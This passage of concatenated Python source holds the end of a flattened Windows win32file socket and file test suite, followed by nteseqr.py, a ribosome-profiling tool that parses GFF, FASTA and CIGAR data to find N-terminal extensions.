flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME while 1: try: print("waiting", dh) changes = win32file.ReadDirectoryChangesW(dh, 8192, False, #sub-tree flags) print("got", changes) except: raise changes.extend(changes) def _watcherThreadOverlapped(self, dn, dh, changes): flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME buf = win32file.AllocateReadBuffer(8192) overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) while 1: win32file.ReadDirectoryChangesW(dh, buf, False, #sub-tree flags, overlapped) # Wait for our event, or for 5 seconds. rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000) if rc == win32event.WAIT_OBJECT_0: # got some data! Must use GetOverlappedResult to find out # how much is valid! 0 generally means the handle has # been closed. Blocking is OK here, as the event has # already been set. nbytes = win32file.GetOverlappedResult(dh, overlapped, True) if nbytes: bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes) changes.extend(bits) else: # This is "normal" exit - our 'tearDown' closes the # handle. # print "looks like dir handle was closed!" return else: print("ERROR: Watcher thread timed-out!") return # kill the thread! def tearDown(self): # be careful about raising errors at teardown! for h in self.dir_handles: # See comments in _watcherThread above - this appears to # deadlock if a synchronous ReadDirectoryChangesW is waiting... # (No such problems with an asynch ReadDirectoryChangesW) h.Close() for dn in self.dir_names: try: shutil.rmtree(dn) except OSError: print("FAILED to remove directory", dn) for t in self.watcher_threads: # closing dir handle should have killed threads! 
t.join(5) if t.isAlive(): print("FAILED to wait for thread termination") def stablize(self): time.sleep(0.5) def testSimple(self): self.stablize() for dn in self.dir_names: fn = os.path.join(dn, "test_file") open(fn, "w").close() self.stablize() changes = self.watcher_thread_changes[0] self.failUnlessEqual(changes, [(1, "test_file")]) def testSmall(self): self.stablize() for dn in self.dir_names: fn = os.path.join(dn, "x") open(fn, "w").close() self.stablize() changes = self.watcher_thread_changes[0] self.failUnlessEqual(changes, [(1, "x")]) class TestEncrypt(unittest.TestCase): def testEncrypt(self): fname = tempfile.mktemp("win32file_test") f = open(fname, "wb") f.write(str2bytes("hello")) f.close() f = None try: try: win32file.EncryptFile(fname) except win32file.error as details: if details.winerror != winerror.ERROR_ACCESS_DENIED: raise print("It appears this is not NTFS - cant encrypt/decrypt") win32file.DecryptFile(fname) finally: if f is not None: f.close() os.unlink(fname) class TestConnect(unittest.TestCase): def connect_thread_runner(self, expect_payload, giveup_event): # As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking # accept, as our test connection may never come. May as well use # AcceptEx for this... listener = socket.socket() self.addr = ('localhost', random.randint(10000,64000)) listener.bind(self.addr) listener.listen(1) # create accept socket accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # An overlapped overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) # accept the connection. if expect_payload: buf_size = 1024 else: # when we don't expect data we must be careful to only pass the # exact number of bytes for the endpoint data... buf_size = win32file.CalculateSocketEndPointSize(listener) buffer = win32file.AllocateReadBuffer(buf_size) win32file.AcceptEx(listener, accepter, buffer, overlapped) # wait for the connection or our test to fail. 
events = giveup_event, overlapped.hEvent rc = win32event.WaitForMultipleObjects(events, False, 2000) if rc == win32event.WAIT_TIMEOUT: self.fail("timed out waiting for a connection") if rc == win32event.WAIT_OBJECT_0: # Our main thread running the test failed and will never connect. return # must be a connection. nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False) if expect_payload: self.request = buffer[:nbytes] accepter.send(str2bytes('some expected response')) def test_connect_with_payload(self): giveup_event = win32event.CreateEvent(None, 0, 0, None) t = threading.Thread(target=self.connect_thread_runner, args=(True, giveup_event)) t.start() time.sleep(0.1) s2 = socket.socket() ol = pywintypes.OVERLAPPED() s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand try: win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request")) except win32file.error as exc: win32event.SetEvent(giveup_event) if exc.winerror == 10022: # WSAEINVAL raise TestSkipped("ConnectEx is not available on this platform") raise # some error error we don't expect. 
win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() buff = win32file.AllocateReadBuffer(1024) win32file.WSARecv(s2, buff, ol, 0) length = win32file.GetOverlappedResult(s2.fileno(), ol, 1) self.response = buff[:length] self.assertEqual(self.response, str2bytes('some expected response')) self.assertEqual(self.request, str2bytes('some expected request')) t.join(5) self.failIf(t.isAlive(), "worker thread didn't terminate") def test_connect_without_payload(self): giveup_event = win32event.CreateEvent(None, 0, 0, None) t = threading.Thread(target=self.connect_thread_runner, args=(False, giveup_event)) t.start() time.sleep(0.1) s2 = socket.socket() ol = pywintypes.OVERLAPPED() s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand try: win32file.ConnectEx(s2, self.addr, ol) except win32file.error as exc: win32event.SetEvent(giveup_event) if exc.winerror == 10022: # WSAEINVAL raise TestSkipped("ConnectEx is not available on this platform") raise # some error error we don't expect. win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() buff = win32file.AllocateReadBuffer(1024) win32file.WSARecv(s2, buff, ol, 0) length = win32file.GetOverlappedResult(s2.fileno(), ol, 1) self.response = buff[:length] self.assertEqual(self.response, str2bytes('some expected response')) t.join(5) self.failIf(t.isAlive(), "worker thread didn't terminate") class TestTransmit(unittest.TestCase): def test_transmit(self): import binascii try: bytes = os.urandom(1024*1024) except AttributeError: # must be py2.3... 
bytes = ''.join([chr(random.randint(0,255)) for _ in range(5)]) val = binascii.hexlify(bytes) val_length = len(val) f = tempfile.TemporaryFile() f.write(val) def runner(): s1 = socket.socket() self.addr = ('localhost', random.randint(10000,64000)) s1.bind(self.addr) s1.listen(1) cli, addr = s1.accept() buf = 1 self.request = [] while buf: buf = cli.recv(1024*100) self.request.append(buf) th = threading.Thread(target=runner) th.start() time.sleep(0.5) s2 = socket.socket() s2.connect(self.addr) length = 0 aaa = str2bytes("[AAA]") bbb = str2bytes("[BBB]") ccc = str2bytes("[CCC]") ddd = str2bytes("[DDD]") empty = str2bytes("") ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) s2.close() th.join() buf = str2bytes('').join(self.request) self.assertEqual(length, len(buf)) expected = val + aaa + val + bbb + val + val + ccc + ddd + val self.assertEqual(type(expected), type(buf)) self.assert_(expected == buf) class TestWSAEnumNetworkEvents(unittest.TestCase): def test_basics(self): s = socket.socket() e = win32event.CreateEvent(None, 1, 0, None) win32file.WSAEventSelect(s, 
e, 0) self.assertEquals(win32file.WSAEnumNetworkEvents(s), {}) self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {}) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam") self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam") f = open("NUL") h = win32file._get_osfhandle(f.fileno()) self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h) self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h) try: win32file.WSAEnumNetworkEvents(h) except win32file.error as e: self.assertEquals(e.winerror, win32file.WSAENOTSOCK) try: win32file.WSAEnumNetworkEvents(s, h) except win32file.error as e: # According to the docs it would seem reasonable that # this would fail with WSAEINVAL, but it doesn't. self.assertEquals(e.winerror, win32file.WSAENOTSOCK) def test_functional(self): # This is not really a unit test, but it does exercise the code # quite well and can serve as an example of WSAEventSelect and # WSAEnumNetworkEvents usage. 
port = socket.socket() port.setblocking(0) port_event = win32event.CreateEvent(None, 0, 0, None) win32file.WSAEventSelect(port, port_event, win32file.FD_ACCEPT | win32file.FD_CLOSE) port.bind(("127.0.0.1", 0)) port.listen(10) client = socket.socket() client.setblocking(0) client_event = win32event.CreateEvent(None, 0, 0, None) win32file.WSAEventSelect(client, client_event, win32file.FD_CONNECT | win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE) err = client.connect_ex(port.getsockname()) self.assertEquals(err, win32file.WSAEWOULDBLOCK) res = win32event.WaitForSingleObject(port_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(port, port_event) self.assertEquals(events, {win32file.FD_ACCEPT: 0}) server, addr = port.accept() server.setblocking(0) server_event = win32event.CreateEvent(None, 1, 0, None) win32file.WSAEventSelect(server, server_event, win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(server, server_event) self.assertEquals(events, {win32file.FD_WRITE: 0}) res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_CONNECT: 0, win32file.FD_WRITE: 0}) sent = 0 data = str2bytes("x") * 16 * 1024 while sent < 16 * 1024 * 1024: try: sent += client.send(data) except socket.error as e: if e.args[0] == win32file.WSAEINTR: continue elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS): break else: raise else: self.fail("could not find socket buffer limit") events = win32file.WSAEnumNetworkEvents(client) self.assertEquals(events, {}) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(server, 
server_event) self.assertEquals(events, {win32file.FD_READ: 0}) received = 0 while received < sent: try: received += len(server.recv(16 * 1024)) except socket.error as e: if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]: continue else: raise self.assertEquals(received, sent) events = win32file.WSAEnumNetworkEvents(server) self.assertEquals(events, {}) res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_WRITE: 0}) client.shutdown(socket.SHUT_WR) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) # strange timing issues... for i in range(5): events = win32file.WSAEnumNetworkEvents(server, server_event) if events: break win32api.Sleep(100) else: raise AssertionError("failed to get events") self.assertEquals(events, {win32file.FD_CLOSE: 0}) events = win32file.WSAEnumNetworkEvents(client) self.assertEquals(events, {}) server.close() res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_CLOSE: 0}) client.close() events = win32file.WSAEnumNetworkEvents(port) self.assertEquals(events, {}) if __name__ == '__main__': testmain()
# ===== nteseqr.py — second concatenated source file begins here =====
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 16 16:39:54 2018
nteseqr
Description: Takes ribosome profiling data and annotated reference genomes to identify N-terminal extensions (NTE)
@author: Pieter Spealman

12.3.2019 (Concentrate Feed)
    Implementing improvements for MiMB publication
    _x_ nteseqr, identify high likelihood NTEs and filter them from uORFseqr
04.28.2021 (Oral Solve)
    _x_ Removed atis_uid hash
"""
#
#import multiprocessing
import re
import numpy as np
import pickle
import scipy.stats as stats
import argparse
import subprocess
import os

def output_handler(output):
    # Echo captured subprocess output only when it contains more than
    # whitespace / a single stray character.
    if len(output.strip()) > 1:
        print(output)

#function handles help commands
def help_dialog():
    # Print the manual / usage overview for nteseqr.
    # NOTE(review): two adjacent literals below rely on implicit string
    # concatenation (no '+') — preserved as written.
    monolog=('Manual for nteseqr\n'+
             '#=============================================================#\n'+
             'Lead programmer: Pieter Spealman pspsealman@nyu.edu\n'+
             'Release version: 1.0 \n'+
             'Release date: 12.31.19 \n'+
             'Description:\n\t nteseqr identifies N-terminal extensions using ribosome \n'+
             '\t profiling and RNAseq data.\n'+
             '\t\t Briefly, NTE-seqr attempts to identify N-terminal extensions by first \n'+
             '\t finding all regions upstream of main ORF start codons and the nearest \n'+
             '\t in-frame upstream stop codon. These search regions are then scanned to \n'+
             '\t identify genes with large numbers of in-frame ribosomes. Search regions \n'+
             '\t are also scanned for AUG and NCC start codons. We presume that the start \n'+
             '\t codon most likely to function as the initiation site will have a confluence \n'+
             '\t of features: higher relative start magnitude, higher relative translational \n'+
             '\t efficiency, and a significant fraction of total in-frame ribosomes.'+
             'Citation:'+
             'Copyright MIT License - Pieter Spealman'
             '#=============================================================#\n'+
             'For demonstration use:\n\t python nteseqr.py -demo\n'+
             'To run a install test using defaults, use:\n\t python uorfseqr.py -test\n'+
             '')
    print(monolog)

#
def demo():
    # Walk the user through the -load / -eval workflow with example commands.
    # The bare triple-quoted strings between steps are real invocations kept
    # as in-function notes.
    monolog = ('\tStep 1. -load command loads and assigns reads. This will need to be done for '+
               'every pair of RPF and RNA files. Here we use only two, the minimum number.\n')
    print(monolog)
    monolog = ('\t\tUsage:\n\tpython nteseqr.py -load -gff <path_to_gff_file> -fa <path to reference fasta file>\n'+
               '\t-sample <sample_name> <path_to_RPF_bam_file> <path_to_RNA_bam_file> -o <output_prefix>'+
               '\t\tExample:\n\tpython nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_A data/bam/Scer_A_RPF_10.bam data/bam/Scer_A_mRNA_10.bam -o Scer_A_nte\n')
    print(monolog)
    '''
    python scripts/nteseqr.py -load -gff ensembl_50/saccharomyces_cerevisiae.gff \
        -fa ensembl_50/Saccharomyces_cerevisiae.R64-1-1.dna.toplevel.fa \
        -samples DGY1657_R1_nte \
        /scratch/ps163/STAR_Carolina_03_18_2021/processed/RPF_DGY1657_R1.sorted.bam \
        /scratch/ps163/STAR_Carolina_03_18_2021/processed/RNA_DGY1657_R1.sorted.bam \
        -o nte/DGY1657_R1_nte
    '''
    monolog = ('\tStep 2. -load command loads and assigns reads for replicate 2.\n')
    print(monolog)
    monolog = ('\t\tUsage:\n\tpython nteseqr.py -load -gff <path_to_gff_file> -fa <path to reference fasta file>\n'+
               '\t-sample <sample_name> <path_to_RPF_bam_file> <path_to_RNA_bam_file> -o <output_prefix>'+
               '\t\tExample:\n\tpython nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_B data/bam/Scer_B_RPF_10.bam data/bam/Scer_B_mRNA_10.bam -o Scer_B_nte\n')
    print(monolog)
    '''
    python scripts/nteseqr.py -load -gff ensembl_50/saccharomyces_cerevisiae.gff \
        -fa ensembl_50/Saccharomyces_cerevisiae.R64-1-1.dna.toplevel.fa \
        -samples DGY1657_R2_nte \
        /scratch/ps163/STAR_Carolina_03_18_2021/processed/RPF_DGY1657_R2.sorted.bam \
        /scratch/ps163/STAR_Carolina_03_18_2021/processed/RNA_DGY1657_R2.sorted.bam \
        -o nte/DGY1657_R2_nte
    '''
    monolog = ('\tStep 3. -eval command generates candidate uORFs using the previouslt loaded samples.\n'+
               'Note that the -samples values here are the output (-o) from the previous two steps.\n')
    print(monolog)
    monolog = ('\t\tUsage:\n\tpython nteseqr.py -eval -samples <name_of_sample_1> <name_of_sample_2> -o <output_prefix>\n'+
               '\t\tExample:\n\tpython nteseqr.py -eval -samples Scer_A_nte Scer_B_nte -o scer.demo/combined\n')
    print(monolog)
    '''
    python scripts/nteseqr.py -eval -samples nte/DGY1657_R1_nte nte/DGY1657_R2_nte -o nte/DG1657_nte
    '''
    monolog = ('\tStep 4. NTE candidate file.\n'+
               '\tThe highest scoring alternative translation initiation site (aTIS) for each NTE event\n'+
               'is output in bed file format.')
    print(monolog)

#
def test():
    # Self-test: shells out to this same script for the two -load steps and
    # the -eval step, echoing any subprocess output via output_handler.
    monolog = ('=== Currently Testing nteseqr.py ===')
    print(monolog)

    monolog = ('\tTesting Step 1a. -load command loads and assigns reads for replicate 1.\n')
    print(monolog)
    bashCommand = ('python nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_A ../data/bam/Scer_A_RPF_10.bam ../data/bam/Scer_A_mRNA_10.bam -o Scer_A_nte')
    print(bashCommand)
    output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True))

    monolog = ('\tTesting Step 1b. -load command loads and assigns reads for replicate 2.\n')
    print(monolog)
    bashCommand = ('python nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_B ../data/bam/Scer_B_RPF_10.bam ../data/bam/Scer_B_mRNA_10.bam -o Scer_B_nte')
    print(bashCommand)
    output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True))

    monolog = ('\tTesting Step 3. -eval command to evaluate candidates based on loaded expression data.\n')
    print(monolog)
    bashCommand = ('python nteseqr.py -eval -samples Scer_A_nte Scer_B_nte -o scer.demo/combined')
    print(bashCommand)
    output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True))

### Argparser definitions
parser = argparse.ArgumentParser()
##nteseqr
'''
python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r2 r2_RPF.bam r2_RNA.bam -o set_r2
python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r3 r3_RPF.bam r3_RNA.bam -o set_r3
python nteseqr.py -eval -samples set_r2 set_r3 -o set_combined
---
python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r2 ./Scer_r2Starved_RPF_genome_Aligned.out.bam ./Scer_r2Starved_mRNA_genome_Aligned.out.bam -o starved_r2
python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r3 ./Scer_r3Starved_RPF_genome_Aligned.out.bam ./Scer_r3Starved_mRNA_genome_Aligned.out.bam -o starved_r3
python nteseqr.py -eval -samples starved_r2 starved_r3 -o starved_combined
'''
# help dialog arguments
parser.add_argument('-man',"--manual", action='store_true')
parser.add_argument('-demo',"--demo",action='store_true')
parser.add_argument('-test',"--test",action='store_true')
# Load reads arguments
parser.add_argument('-load',"--load_reads", action='store_true')
parser.add_argument('-i',"--input_file")
parser.add_argument('-o',"--output_file")
parser.add_argument('-fa',"--fa_file")
parser.add_argument('-gff',"--gff_file")
# -samples: sample name followed by RPF and RNA bam paths (for -load), or
# previously loaded sample prefixes (for -eval)
parser.add_argument('-samples', '--sample_list', nargs='+')
parser.add_argument('-gt',"--gene_tag")
parser.add_argument('-tl',"--transcript_leader_tag")
parser.add_argument('-3p',"--three_prime_UTR_tag")
parser.add_argument('-min_tl',"--minimum_length_transcript_leader")
parser.add_argument('-min_3p',"--minimum_length_three_prime_UTR")
parser.add_argument('-mask_tl',"--mask_length_transcript_leader")
parser.add_argument('-mask_3p',"--mask_length_three_prime_UTR")
# NOTE(review): the short flag is spelled '-defualt' in the released CLI;
# renaming it would break existing invocations, so it is left as-is.
parser.add_argument('-defualt',"--default_search_region_length")
#evaluate arguments
parser.add_argument('-eval',"--evaluate", action='store_true')
parser.add_argument('-min_reads',"--minimum_reads")
#
args = parser.parse_args()

###
#Common dictionaries
start_codons = ['ATG', 'TTG', 'GTG', 'CTG', 'ATC', 'ATA', 'ATT', 'ACG']
stop_codons = ['TAG', 'TAA', 'TGA']
strand_to_sign = {0:'+',1:'-'}
complement = {'A':'T','G':'C','T':'A','C':'G'}
###

if args.manual:
    help_dialog()

if args.test:
    test()

def parse_cigar(cigar, sequence):
    """This function calculates the offset for the read based on the match

    Returns (True, '<n>M', trimmed_sequence) for CIGAR strings containing a
    single 'M' operation; (False, '', '') otherwise.
    """
    # TODO - maybe improve to handle '28M1I4M', 'TCAGGGAAATATTGATTTACCCAAAAAAAGACG'
    if cigar.count('M') == 1:
        left_cut = 0
        right_cut = 0

        # digits before the 'M' op are left-side clips; after it, right-side
        left_list = re.split('M|S|D|I|H|N', cigar.split('M')[0])[0:-1]
        M = re.split('M|S|D|I|H|N', cigar.split('M')[0])[-1]
        right_list = re.split('M|S|D|I|H|N', cigar.split('M')[1])

        for each in left_list:
            if each:
                left_cut += int(each)

        for each in right_list:
            if each:
                # accumulated as a negative slice end
                right_cut -= int(each)

        n_cigar = ('{}M').format(M)

        if right_cut:
            n_sequence = sequence[left_cut:right_cut]
        else:
            n_sequence = sequence[left_cut:]

        #print (left_cut, right_cut, n_cigar, n_sequence)
        return(True, n_cigar, n_sequence)
    else:
        return(False, '', '')

def unpackbits(x, num_bits=12):
    # Expand an integer numpy array of SAM flags into per-bit 0/1 columns
    # (last axis has num_bits entries, lowest bit first).
    xshape = list(x.shape)
    x = x.reshape([-1,1])
    to_and = 2**np.arange(num_bits).reshape([1,num_bits])
    upb = (x & to_and).astype(bool).astype(int).reshape(xshape + [num_bits])
    #0  (rp) read_paired
    #1  (rmp) read_mapped_in_proper_pair
    #2  (ru) read_unmapped
    #3  (mu) mate_unmapped
    #4  (rrs) read_reverse_strand
    #5  (mrs) mate_reverse_strand
    #6  (fip) first_in_pair
    #7  (sip) second_in_pair
    #8  (npa) not_primary_alignment
    #9  (rfp) read_fails_platform
    #10 (pcr) read_is_PCR_or_optical_duplicate
    #11 (sa) supplementary_alignment
    """ DISCORDANT definition (from samblaster)
        Both side of the read pair are mapped (neither FLAG 0x4 or 0x8 is set).
        The properly paired FLAG (0x2) is not set.
        Note: We implemented an additional criteria to distinguish between strand re-orientations and distance issues
        Strand Discordant reads must be both on the same strand.
    """
    """ SPLIT READS
        Identify reads that have between two and --maxSplitCount [2] primary and supplemental alignments.
        Sort these alignments by their strand-normalized position along the read.
        Two alignments are output as splitters if they are adjacent on the read, and meet these criteria:
            each covers at least --minNonOverlap [20] base pairs of the read that the other does not.
            the two alignments map to different reference sequences and/or strands.
            the two alignments map to the same sequence and strand, and represent a SV that is at least --minIndelSize [50] in length,
            and have at most --maxUnmappedBases [50] of un-aligned base pairs between them.
        Split read alignments that are part of a duplicate read will be output unless the -e option is used.
    """
    return(upb)

def os_mkdir(in_name):
    # Create the parent directory of a path-like prefix if it doesn't exist.
    if '/' in in_name:
        directory_name = in_name.rsplit('/',1)[0]
        if not os.path.exists(directory_name):
            os.makedirs(directory_name)

###
'''
Handle inputs and defaults:
    users can set their own gff file to define 5'UTRs (aka. transcript leaders), 3'UTRs,
    Transcription start sites, poly-a sites, and main orf coordinates.
    Otherwise the standard gff for S.cerevisiae (from Spealman and Naik, Genome Research, 2017) is loaded.
'''
if args.gff_file:
    gff_file = args.gff_file
else:
    gff_file = '../data/reference_genomes/saccharomyces_cerevisiae.gff'

'''
Given a gff and fasta identity the upstream in frame stops, then downstream inframe starts,
then ask if reads from a sam map to those starts.
'''
if args.gene_tag:
    gene_tag = args.gene_tag
else:
    gene_tag = 'gene'

if args.transcript_leader_tag:
    tl_tag = args.transcript_leader_tag
else:
    tl_tag = 'five_prime_UTR'

if args.three_prime_UTR_tag:
    tp_tag = args.three_prime_UTR_tag
else:
    tp_tag = 'three_prime_UTR'

if args.minimum_length_transcript_leader:
    min_tl = int(args.minimum_length_transcript_leader)
else:
    min_tl = 15

# TODO - future version turns this on
#if args.minimum_length_three_prime_UTR:
#    min_3p = int(args.minimum_length_three_prime_UTR)
#else:
#    min_3p = 15
min_3p = 0

if args.mask_length_transcript_leader:
    mask_tl = int(args.mask_length_transcript_leader)
else:
    mask_tl = 3

if args.mask_length_three_prime_UTR:
    mask_3p = int(args.mask_length_three_prime_UTR)
else:
    mask_3p = 3

if args.default_search_region_length:
    dsrl = int(args.default_search_region_length)
else:
    dsrl = 0

if args.minimum_reads:
    minimum_reads = int(args.minimum_reads)
else:
    minimum_reads = 3

def parse_name(field):
    # Extract the feature identifier from a gff attribute column,
    # preferring ID= over PARENT=, and stripping ';...' and '_mRNA' suffixes.
    field = field.strip()
    if 'ID=' in field:
        field = field.split('ID=')[1]
    else:
        if 'PARENT=' in field:
            field = field.split('PARENT=')[1]
    if ';' in field:
        field = field.split(';')[0]
    if '_mRNA' in field:
        field = field.split('_mRNA')[0]
    return(field)

def parse_gff(gff_name, gene_tag, tl_tag, tp_tag, min_utr, min_3p, mask_tl, mask_3p):
    # Build {name: {chromo, sign, gene, tl, tp, ...}} from a gff file and
    # populate the global filter_nt mask near UTR boundaries.  Entries with
    # no gene coords or a 'too_small' UTR are dropped before returning.
    global fasta_dict
    global filter_nt

    coord_dict = {}
    chromosome_set = set()

    gff_file = open(gff_name)

    #Build coord_dict
    for line in gff_file:
        if line[0] != '#':
            name = parse_name(line.split('\t')[8])
            chromo = line.split('\t')[0]
            region = line.split('\t')[2]
            start = int(line.split('\t')[3])-1
            stop = int(line.split('\t')[4])
            sign = line.split('\t')[6]

            if chromo not in chromosome_set:
                # normalize 'chrX' style names to bare chromosome names
                if 'chr' in chromo:
                    chromo = chromo.split('chr')[1]
                chromosome_set.add(chromo)

            if name not in coord_dict:
                coord_dict[name] = {'chromo': chromo, 'sign': line.split('\t')[6], 'tl':'', 'gene':'', 'tp': '', 'tl_mask':'', 'tp_mask':''}

            if chromo not in filter_nt:
                filter_nt[chromo] = set()

            if region == gene_tag:
                coord_dict[name]['gene'] = (start, stop)

            if region == tl_tag:
                if abs(stop - start) > min_utr:
                    coord_dict[name]['tl'] = (start, stop)

                    # mask nucleotides adjacent to the start codon
                    if sign == '+':
                        for nt in range(stop-mask_tl, stop+1):
                            filter_nt[chromo].add(nt)
                    else:
                        for nt in range(start, start+mask_tl+1):
                            filter_nt[chromo].add(nt)
                else:
                    coord_dict[name]['tl'] = 'too_small'

            # TODO: Future version - C-terminal extensions should be a similar work flow
            #            if region == tp_tag:
            #                if abs(stop-start) > min_3p:
            #                    coord_dict[name]['tp'] = (start, stop)
            #
            #                    if sign == '+':
            #                        for nt in range(start, start+mask_3p+1):
            #                            filter_nt[chromo].add(nt)
            #                    else:
            #                        for nt in range(stop-mask_3p, stop+1):
            #                            filter_nt[chromo].add(nt)
            #                else:
            #                    coord_dict[name]['tp'] = 'too_small'

    gff_file.close()

    # cycle through coord_dict, remove anything with 'too_small'
    remove_set = set()
    for name, region_dict in coord_dict.items():
        if not region_dict['gene']:
            remove_set.add(name)
        else:
            for each_region in ['tl','tp']:
                if region_dict[each_region] == 'too_small':
                    remove_set.add(name)

    for remove in remove_set:
        _pop = coord_dict.pop(remove)
        if '@' not in remove:
            outline = ('Removing {} for to short of a UTR.').format(remove)
            print(outline)

    return(coord_dict, chromosome_set)

def parse_fasta(fasta_name):
    # Load a fasta file into {chromosome_name: sequence}; aborts on
    # duplicate record names.
    fasta_file = open(fasta_name)
    fasta_dict = {}
    for line in fasta_file:
        line = line.strip()
        if line[0] == '>':
            name = line.split('>')[1].split(' ')[0]
            name = name.strip()
            if name not in fasta_dict:
                fasta_dict[name]=''
            else:
                print('Error in FASTQ chromosome name, duplicate names identified.\n Names are after the carrot ">" and before the space " " - Make sure each name is unique. ')
                quit()
        else:
            fasta_dict[name]+=line
    return(fasta_dict)

def rev_comp(seq):
    # Reverse-complement an A/C/G/T sequence (uppercased first).
    seq = seq.upper()
    seq = seq[::-1]
    rev_seq = ''
    for each in seq:
        rev_seq+= complement[each]
    return(rev_seq)

def use_dsrl(name, region, first_pass_dict, coord_dict):
    # When no annotated UTR exists, substitute a default-length search
    # region (dsrl nt) flanking the gene, on the strand-appropriate side.
    chromo = first_pass_dict[name]['chromo']
    sign = first_pass_dict[name]['sign']
    gleast = coord_dict[name]['gene'][0]
    gmost = coord_dict[name]['gene'][1]

    if region == 'tl':
        if sign == '+':
            start = int(gleast)-dsrl
            stop = int(gleast)-1
            first_pass_dict[name][region] = fasta_dict[chromo][start:stop]
            coord_dict[name][region]=(start, stop)
        if sign == '-':
            start = int(gmost)+1
            stop = int(gmost)+dsrl
            first_pass_dict[name][region] = fasta_dict[chromo][start:stop]
            coord_dict[name][region]=(start, stop)

    if region == 'tp':
        if sign == '-':
            start = int(gleast)-dsrl
            stop = int(gleast)-1
            first_pass_dict[name][region] = fasta_dict[chromo][start:stop]
            coord_dict[name][region]=(start, stop)
        if sign == '+':
            start = int(gmost)+1
            stop = int(gmost)+dsrl
            first_pass_dict[name][region] = fasta_dict[chromo][start:stop]
            coord_dict[name][region]=(start, stop)

    return(first_pass_dict, coord_dict)

#def derive_coordinates(start, stop, triplet_step, sign, runmode):
#    if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'):
#        sr_start = stop - (triplet_step*3)-3
#        sr_stop = stop
#    if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'):
#        sr_start = start
#        sr_stop = start + (triplet_step*3)+3
#
#    return(sr_start, sr_stop)
#
#def recover_sequence(triplet_step, tl_list, sign, runmode):
